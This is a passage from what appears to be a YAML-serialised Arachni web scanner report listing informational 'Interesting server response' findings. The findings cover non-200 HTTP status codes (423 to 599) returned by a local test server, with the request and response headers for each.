      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4231234"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/423
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/424
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 424"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 424"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "424727"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/424
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/425
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 425"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 425"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "425877"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/425
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/426
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 426"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 426"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4261890"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/426
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/428
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 428"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 428"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4281811"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/428
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/429
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 429"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 429"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4298347"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/429
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/431
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 431"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 431"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4319477"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/431
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/444
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 444"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 444"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4443674"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/444
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/449
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 449"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 449"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4491178"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/449
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/450
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 450"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 450"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4509591"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/450
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/451
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 451"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 451"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4518154"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/451
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/499
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 499"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 499"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4996411"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/499
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/500
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 500"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 500"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "500767"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/500
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/501
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 501"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 501"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "5015093"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/501
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/503
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 503"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 503"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "5036724"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/503
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/504
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 504"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 504"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "5041851"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/504
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/506
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 506"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 506"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "5062243"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/506
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/507
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 507"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 507"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "5078730"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/507
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/508
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 508"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 508"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "5089069"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/508
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/509
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 509"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 509"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "509775"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/509
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/510
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 510"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 510"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "5109283"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/510
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/511
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 511"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 511"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "51197"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/511
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/598
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 598"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 598"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "5988111"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/598
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/599
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 599"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 599"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "5996014"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/599
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/502
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 502"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 502"
      :element: server
